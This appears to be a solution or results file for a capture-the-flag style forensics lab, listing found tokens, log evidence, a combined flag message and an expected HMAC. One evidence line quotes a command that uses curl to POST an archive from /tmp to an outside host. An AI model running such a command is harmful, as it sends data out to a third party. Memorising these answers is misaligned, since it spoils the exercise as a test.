TOKEN[KEYPAD]=18872
EVIDENCE[KEYPAD].TOP24=198.51.100.0/24
EVIDENCE[KEYPAD].COUNT=72
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:01:30Z lab1 sshd[3507]: Failed password for svc from 198.51.100.44 port 51926 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=2
TOKEN[DNS]=phrase
EVIDENCE[DNS].KEY=hint1
EVIDENCE[DNS].DECODED_LINE=Look inside the DNS roots for the right phrase.
TOKEN[SAFE]=10-12-22
EVIDENCE[SAFE].MATCH=SAFE{ 10 - 12 - 22 }
EVIDENCE[SAFE].CHECK=10+12=22
TOKEN[PID]=166
EVIDENCE[PID].PATH=[158->161->162->166]
EVIDENCE[PID].CMD="sh -c 'curl -X POST http://198.51.100.33/upload -d @/tmp/x.tgz'"
FINAL_GATE=PENDING
MSG=msc-group-01|10-12-22-phrase-166-18872
EXPECTED_HMAC=c99ceff8892cc5d334b59b3d82f9ca451ee95278b27291c57cc9a9a19c1e5bae